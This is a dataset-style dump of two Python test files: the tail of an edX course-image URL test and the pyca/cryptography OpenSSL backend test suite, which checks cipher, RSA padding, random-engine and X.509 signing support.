Verify that if a course has empty `course_image`, `course_image_url` returns
`DEFAULT_COURSE_ABOUT_IMAGE_URL` defined in the settings.
"""
course = CourseFactory.create(course_image='', default_store=default_store)
self.assertEquals(
'static/test.png',
course_image_url(course),
)
def test_get_banner_image_url(self):
"""Test banner image URL formatting."""
banner_image = u'banner_image.jpg'
course = CourseFactory.create(banner_image=banner_image)
self.verify_url(
unicode(course.id.make_asset_key('asset', banner_image)),
course_image_url(course, 'banner_image')
)
def test_get_video_thumbnail_image_url(self):
"""Test video thumbnail image URL formatting."""
thumbnail_image = u'thumbnail_image.jpg'
course = CourseFactory.create(video_thumbnail_image=thumbnail_image)
self.verify_url(
unicode(course.id.make_asset_key('asset', thumbnail_image)),
course_image_url(course, 'video_thumbnail_image')
)
|
ahmedaljazzar/edx-platform
|
openedx/core/lib/tests/test_courses.py
|
Python
|
agpl-3.0
| 3,146 | 0.001271 |
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import datetime
import itertools
import os
import subprocess
import sys
import textwrap
from pkg_resources import parse_version
import pytest
from cryptography import utils, x509
from cryptography.exceptions import InternalError, _Reasons
from cryptography.hazmat.backends.interfaces import RSABackend
from cryptography.hazmat.backends.openssl.backend import (
Backend, backend
)
from cryptography.hazmat.backends.openssl.ec import _sn_to_elliptic_curve
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import dsa, ec, padding
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CBC, CTR
from ..primitives.fixtures_dsa import DSA_KEY_2048
from ..primitives.fixtures_rsa import RSA_KEY_2048, RSA_KEY_512
from ..primitives.test_ec import _skip_curve_unsupported
from ...doubles import (
DummyAsymmetricPadding, DummyCipherAlgorithm, DummyHashAlgorithm, DummyMode
)
from ...test_x509 import _load_cert
from ...utils import load_vectors_from_file, raises_unsupported_algorithm
def skip_if_libre_ssl(openssl_version):
if u'LibreSSL' in openssl_version:
pytest.skip("LibreSSL hard-codes RAND_bytes to use arc4random.")
class TestLibreSkip(object):
def test_skip_no(self):
assert skip_if_libre_ssl(u"OpenSSL 1.0.2h 3 May 2016") is None
def test_skip_yes(self):
with pytest.raises(pytest.skip.Exception):
skip_if_libre_ssl(u"LibreSSL 2.1.6")
class DummyMGF(object):
_salt_length = 0
class TestOpenSSL(object):
def test_backend_exists(self):
assert backend
def test_openssl_version_text(self):
"""
This test checks the value of OPENSSL_VERSION_TEXT.
Unfortunately, this define does not appear to have a
formal content definition, so for now we'll test to see
if it starts with OpenSSL or LibreSSL as that appears
to be true for every OpenSSL-alike.
"""
assert (
backend.openssl_version_text().startswith("OpenSSL") or
backend.openssl_version_text().startswith("LibreSSL")
)
def test_supports_cipher(self):
assert backend.cipher_supported(None, None) is False
def test_aes_ctr_always_available(self):
# AES CTR should always be available, even in 1.0.0.
assert backend.cipher_supported(AES(b"\x00" * 16),
CTR(b"\x00" * 16)) is True
def test_register_duplicate_cipher_adapter(self):
with pytest.raises(ValueError):
backend.register_cipher_adapter(AES, CBC, None)
@pytest.mark.parametrize("mode", [DummyMode(), None])
def test_nonexistent_cipher(self, mode):
b = Backend()
b.register_cipher_adapter(
DummyCipherAlgorithm,
type(mode),
lambda backend, cipher, mode: backend._ffi.NULL
)
cipher = Cipher(
DummyCipherAlgorithm(), mode, backend=b,
)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_CIPHER):
cipher.encryptor()
def test_openssl_assert(self):
backend.openssl_assert(True)
with pytest.raises(InternalError):
backend.openssl_assert(False)
def test_consume_errors(self):
for i in range(10):
backend._lib.ERR_put_error(backend._lib.ERR_LIB_EVP, 0, 0,
b"test_openssl.py", -1)
assert backend._lib.ERR_peek_error() != 0
errors = backend._consume_errors()
assert backend._lib.ERR_peek_error() == 0
assert len(errors) == 10
def test_ssl_ciphers_registered(self):
meth = backend._lib.TLSv1_method()
ctx = backend._lib.SSL_CTX_new(meth)
assert ctx != backend._ffi.NULL
backend._lib.SSL_CTX_free(ctx)
def test_evp_ciphers_registered(self):
cipher = backend._lib.EVP_get_cipherbyname(b"aes-256-cbc")
assert cipher != backend._ffi.NULL
def test_error_strings_loaded(self):
# returns a value in a static buffer
err = backend._lib.ERR_error_string(101183626, backend._ffi.NULL)
assert backend._ffi.string(err) == (
b"error:0607F08A:digital envelope routines:EVP_EncryptFinal_ex:"
b"data not multiple of block length"
)
def test_unknown_error_in_cipher_finalize(self):
cipher = Cipher(AES(b"\0" * 16), CBC(b"\0" * 16), backend=backend)
enc = cipher.encryptor()
enc.update(b"\0")
backend._lib.ERR_put_error(0, 0, 1,
b"test_openssl.py", -1)
with pytest.raises(InternalError):
enc.finalize()
def test_large_key_size_on_new_openssl(self):
parameters = dsa.generate_parameters(2048, backend)
param_num = parameters.parameter_numbers()
assert utils.bit_length(param_num.p) == 2048
parameters = dsa.generate_parameters(3072, backend)
param_num = parameters.parameter_numbers()
assert utils.bit_length(param_num.p) == 3072
def test_int_to_bn(self):
value = (2 ** 4242) - 4242
bn = backend._int_to_bn(value)
assert bn != backend._ffi.NULL
bn = backend._ffi.gc(bn, backend._lib.BN_free)
assert bn
assert backend._bn_to_int(bn) == value
def test_int_to_bn_inplace(self):
value = (2 ** 4242) - 4242
bn_ptr = backend._lib.BN_new()
assert bn_ptr != backend._ffi.NULL
bn_ptr = backend._ffi.gc(bn_ptr, backend._lib.BN_free)
bn = backend._int_to_bn(value, bn_ptr)
assert bn == bn_ptr
assert backend._bn_to_int(bn_ptr) == value
def test_bn_to_int(self):
bn = backend._int_to_bn(0)
assert backend._bn_to_int(bn) == 0
class TestOpenSSLRandomEngine(object):
def setup(self):
# The default RAND engine is global and shared between
# tests. We make sure that the default engine is osrandom
# before we start each test and restore the global state to
# that engine in teardown.
current_default = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(current_default)
assert name == backend._binding._osrandom_engine_name
def teardown(self):
# we need to reset state to being default. backend is a shared global
# for all these tests.
backend.activate_osrandom_engine()
current_default = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(current_default)
assert name == backend._binding._osrandom_engine_name
@pytest.mark.skipif(sys.executable is None,
reason="No Python interpreter available.")
def test_osrandom_engine_is_default(self, tmpdir):
engine_printer = textwrap.dedent(
"""
import sys
from cryptography.hazmat.backends.openssl.backend import backend
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
sys.stdout.write(backend._ffi.string(name).decode('ascii'))
res = backend._lib.ENGINE_free(e)
assert res == 1
"""
)
engine_name = tmpdir.join('engine_name')
# If we're running tests via ``python setup.py test`` in a clean
# environment then all of our dependencies are going to be installed
# into either the current directory or the .eggs directory. However the
# subprocess won't know to activate these dependencies, so we'll get it
# to do so by passing our entire sys.path into the subprocess via the
# PYTHONPATH environment variable.
env = os.environ.copy()
env["PYTHONPATH"] = os.pathsep.join(sys.path)
with engine_name.open('w') as out:
subprocess.check_call(
[sys.executable, "-c", engine_printer],
env=env,
stdout=out,
stderr=subprocess.PIPE,
)
osrandom_engine_name = backend._ffi.string(
backend._binding._osrandom_engine_name
)
assert engine_name.read().encode('ascii') == osrandom_engine_name
def test_osrandom_sanity_check(self):
# This test serves as a check against catastrophic failure.
buf = backend._ffi.new("unsigned char[]", 500)
res = backend._lib.RAND_bytes(buf, 500)
assert res == 1
assert backend._ffi.buffer(buf)[:] != "\x00" * 500
def test_activate_osrandom_no_default(self):
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
backend.activate_osrandom_engine()
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
assert name == backend._binding._osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
def test_activate_builtin_random(self):
e = backend._lib.ENGINE_get_default_RAND()
assert e != backend._ffi.NULL
name = backend._lib.ENGINE_get_name(e)
assert name == backend._binding._osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
def test_activate_builtin_random_already_active(self):
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
def test_osrandom_engine_implementation(self):
name = backend.osrandom_engine_implementation()
assert name in ['/dev/urandom', 'CryptGenRandom', 'getentropy',
'getrandom']
if sys.platform.startswith('linux'):
assert name in ['getrandom', '/dev/urandom']
if sys.platform == 'darwin':
# macOS 10.12+ supports getentropy
if parse_version(os.uname()[2]) >= parse_version("16.0"):
assert name == 'getentropy'
else:
assert name == '/dev/urandom'
if 'bsd' in sys.platform:
assert name in ['getentropy', '/dev/urandom']
if sys.platform == 'win32':
assert name == 'CryptGenRandom'
def test_activate_osrandom_already_default(self):
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
assert name == backend._binding._osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
backend.activate_osrandom_engine()
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
assert name == backend._binding._osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
class TestOpenSSLRSA(object):
def test_generate_rsa_parameters_supported(self):
assert backend.generate_rsa_parameters_supported(1, 1024) is False
assert backend.generate_rsa_parameters_supported(4, 1024) is False
assert backend.generate_rsa_parameters_supported(3, 1024) is True
assert backend.generate_rsa_parameters_supported(3, 511) is False
def test_generate_bad_public_exponent(self):
with pytest.raises(ValueError):
backend.generate_rsa_private_key(public_exponent=1, key_size=2048)
with pytest.raises(ValueError):
backend.generate_rsa_private_key(public_exponent=4, key_size=2048)
def test_cant_generate_insecure_tiny_key(self):
with pytest.raises(ValueError):
backend.generate_rsa_private_key(public_exponent=65537,
key_size=511)
with pytest.raises(ValueError):
backend.generate_rsa_private_key(public_exponent=65537,
key_size=256)
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_non_sha1_pss_mgf1_hash_algorithm_on_old_openssl(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_HASH):
private_key.signer(
padding.PSS(
mgf=padding.MGF1(
algorithm=hashes.SHA256(),
),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA1()
)
public_key = private_key.public_key()
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_HASH):
public_key.verifier(
b"sig",
padding.PSS(
mgf=padding.MGF1(
algorithm=hashes.SHA256(),
),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA1()
)
def test_rsa_padding_unsupported_pss_mgf1_hash(self):
assert backend.rsa_padding_supported(
padding.PSS(mgf=padding.MGF1(DummyHashAlgorithm()), salt_length=0)
) is False
def test_rsa_padding_unsupported(self):
assert backend.rsa_padding_supported(DummyAsymmetricPadding()) is False
def test_rsa_padding_supported_pkcs1v15(self):
assert backend.rsa_padding_supported(padding.PKCS1v15()) is True
def test_rsa_padding_supported_pss(self):
assert backend.rsa_padding_supported(
padding.PSS(mgf=padding.MGF1(hashes.SHA1()), salt_length=0)
) is True
def test_rsa_padding_supported_oaep(self):
assert backend.rsa_padding_supported(
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA1(),
label=None
),
) is True
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_RSA_OAEP_MD == 0,
reason="Requires OpenSSL with rsa_oaep_md (1.0.2+)"
)
def test_rsa_padding_supported_oaep_sha2_combinations(self):
hashalgs = [
hashes.SHA1(),
hashes.SHA224(),
hashes.SHA256(),
hashes.SHA384(),
hashes.SHA512(),
]
for mgf1alg, oaepalg in itertools.product(hashalgs, hashalgs):
assert backend.rsa_padding_supported(
padding.OAEP(
mgf=padding.MGF1(algorithm=mgf1alg),
algorithm=oaepalg,
label=None
),
) is True
def test_rsa_padding_unsupported_oaep_ripemd160_sha1(self):
assert backend.rsa_padding_supported(
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.RIPEMD160()),
algorithm=hashes.SHA1(),
label=None
),
) is False
def test_rsa_padding_unsupported_oaep_sha1_ripemd160(self):
assert backend.rsa_padding_supported(
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.RIPEMD160(),
label=None
),
) is False
def test_rsa_padding_unsupported_mgf(self):
assert backend.rsa_padding_supported(
padding.OAEP(
mgf=DummyMGF(),
algorithm=hashes.SHA1(),
label=None
),
) is False
assert backend.rsa_padding_supported(
padding.PSS(mgf=DummyMGF(), salt_length=0)
) is False
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_RSA_OAEP_MD == 1,
reason="Requires OpenSSL without rsa_oaep_md (< 1.0.2)"
)
def test_unsupported_mgf1_hash_algorithm_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA1(),
label=None
)
)
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_RSA_OAEP_MD == 1,
reason="Requires OpenSSL without rsa_oaep_md (< 1.0.2)"
)
def test_unsupported_oaep_hash_algorithm_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA256(),
label=None
)
)
def test_unsupported_mgf1_hash_algorithm_ripemd160_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.RIPEMD160()),
algorithm=hashes.RIPEMD160(),
label=None
)
)
def test_unsupported_mgf1_hash_algorithm_whirlpool_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.Whirlpool()),
algorithm=hashes.Whirlpool(),
label=None
)
)
def test_unsupported_oaep_label_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with pytest.raises(ValueError):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA1(),
label=b"label"
)
)
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_101,
reason="Requires an OpenSSL version >= 1.0.1"
)
class TestOpenSSLCMAC(object):
def test_unsupported_cipher(self):
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_CIPHER):
backend.create_cmac_ctx(DummyCipherAlgorithm())
class TestOpenSSLCreateX509CSR(object):
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_unsupported_dsa_keys(self):
private_key = DSA_KEY_2048.private_key(backend)
with pytest.raises(NotImplementedError):
backend.create_x509_csr(object(), private_key, hashes.SHA1())
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_unsupported_ec_keys(self):
_skip_curve_unsupported(backend, ec.SECP256R1())
private_key = ec.generate_private_key(ec.SECP256R1(), backend)
with pytest.raises(NotImplementedError):
backend.create_x509_csr(object(), private_key, hashes.SHA1())
class TestOpenSSLSignX509Certificate(object):
def test_requires_certificate_builder(self):
private_key = RSA_KEY_2048.private_key(backend)
with pytest.raises(TypeError):
backend.create_x509_certificate(
object(), private_key, DummyHashAlgorithm()
)
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_sign_with_dsa_private_key_is_unsupported(self):
private_key = DSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(x509.NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(x509.NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(NotImplementedError):
builder.sign(private_key, hashes.SHA512(), backend)
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_sign_with_ec_private_key_is_unsupported(self):
_skip_curve_unsupported(backend, ec.SECP256R1())
private_key = ec.generate_private_key(ec.SECP256R1(), backend)
builder = x509.CertificateBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(x509.NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(x509.NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(NotImplementedError):
builder.sign(private_key, hashes.SHA512(), backend)
class TestOpenSSLSignX509CertificateRevocationList(object):
def test_invalid_builder(self):
private_key = RSA_KEY_2048.private_key(backend)
with pytest.raises(TypeError):
backend.create_x509_crl(object(), private_key, hashes.SHA256())
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_sign_with_dsa_private_key_is_unsupported(self):
private_key = DSA_KEY_2048.private_key(backend)
builder = x509.CertificateRevocationListBuilder()
builder = builder.issuer_name(
x509.Name([x509.NameAttribute(x509.NameOID.COUNTRY_NAME, u'US')])
).last_update(
datetime.datetime(2002, 1, 1, 12, 1)
).next_update(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(NotImplementedError):
builder.sign(private_key, hashes.SHA1(), backend)
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_sign_with_ec_private_key_is_unsupported(self):
_skip_curve_unsupported(backend, ec.SECP256R1())
private_key = ec.generate_private_key(ec.SECP256R1(), backend)
builder = x509.CertificateRevocationListBuilder()
builder = builder.issuer_name(
x509.Name([x509.NameAttribute(x509.NameOID.COUNTRY_NAME, u'US')])
).last_update(
datetime.datetime(2002, 1, 1, 12, 1)
).next_update(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(NotImplementedError):
builder.sign(private_key, hashes.SHA512(), backend)
class TestOpenSSLCreateRevokedCertificate(object):
def test_invalid_builder(self):
with pytest.raises(TypeError):
backend.create_x509_revoked_certificate(object())
class TestOpenSSLSerializationWithOpenSSL(object):
def test_pem_password_cb_buffer_too_small(self):
ffi_cb, userdata = backend._pem_password_cb(b"aa")
handle = backend._ffi.new_handle(userdata)
buf = backend._ffi.new('char *')
assert ffi_cb(buf, 1, False, handle) == 0
assert userdata.called == 1
assert isinstance(userdata.exception, ValueError)
def test_pem_password_cb(self):
password = b'abcdefg'
buf_size = len(password) + 1
ffi_cb, userdata = backend._pem_password_cb(password)
handle = backend._ffi.new_handle(userdata)
buf = backend._ffi.new('char[]', buf_size)
assert ffi_cb(buf, buf_size, False, handle) == len(password)
assert userdata.called == 1
assert backend._ffi.string(buf, len(password)) == password
def test_unsupported_evp_pkey_type(self):
key = backend._create_evp_pkey_gc()
with raises_unsupported_algorithm(None):
backend._evp_pkey_to_private_key(key)
with raises_unsupported_algorithm(None):
backend._evp_pkey_to_public_key(key)
def test_very_long_pem_serialization_password(self):
password = "x" * 1024
with pytest.raises(ValueError):
load_vectors_from_file(
os.path.join(
"asymmetric", "Traditional_OpenSSL_Serialization",
"key1.pem"
),
lambda pemfile: (
backend.load_pem_private_key(
pemfile.read().encode(), password
)
)
)
class DummyLibrary(object):
Cryptography_HAS_EC = 0
class TestOpenSSLEllipticCurve(object):
def test_elliptic_curve_supported(self, monkeypatch):
monkeypatch.setattr(backend, "_lib", DummyLibrary())
assert backend.elliptic_curve_supported(None) is False
def test_elliptic_curve_signature_algorithm_supported(self, monkeypatch):
monkeypatch.setattr(backend, "_lib", DummyLibrary())
assert backend.elliptic_curve_signature_algorithm_supported(
None, None
) is False
def test_sn_to_elliptic_curve_not_supported(self):
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_ELLIPTIC_CURVE):
_sn_to_elliptic_curve(backend, b"fake")
def test_elliptic_curve_exchange_algorithm_supported(self, monkeypatch):
monkeypatch.setattr(backend, "_lib", DummyLibrary())
assert not backend.elliptic_curve_exchange_algorithm_supported(
ec.ECDH(), ec.SECP256R1()
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
class TestRSAPEMSerialization(object):
def test_password_length_limit(self):
password = b"x" * 1024
key = RSA_KEY_2048.private_key(backend)
with pytest.raises(ValueError):
key.private_bytes(
serialization.Encoding.PEM,
serialization.PrivateFormat.PKCS8,
serialization.BestAvailableEncryption(password)
)
class TestGOSTCertificate(object):
def test_numeric_string_x509_name_entry(self):
cert = _load_cert(
os.path.join("x509", "e-trust.ru.der"),
x509.load_der_x509_certificate,
backend
)
if (
backend._lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_102I or
backend._lib.CRYPTOGRAPHY_IS_LIBRESSL
):
with pytest.raises(ValueError) as exc:
cert.subject
# We assert on the message in this case because if the certificate
# fails to load it will also raise a ValueError and this test could
# erroneously pass.
assert str(exc.value) == "Unsupported ASN1 string type. Type: 18"
else:
assert cert.subject.get_attributes_for_oid(
x509.ObjectIdentifier("1.2.643.3.131.1.1")
)[0].value == "007710474375"
|
hipnusleo/laserjet
|
resource/pypi/cryptography-1.7.1/tests/hazmat/backends/test_openssl.py
|
Python
|
apache-2.0
| 28,781 | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.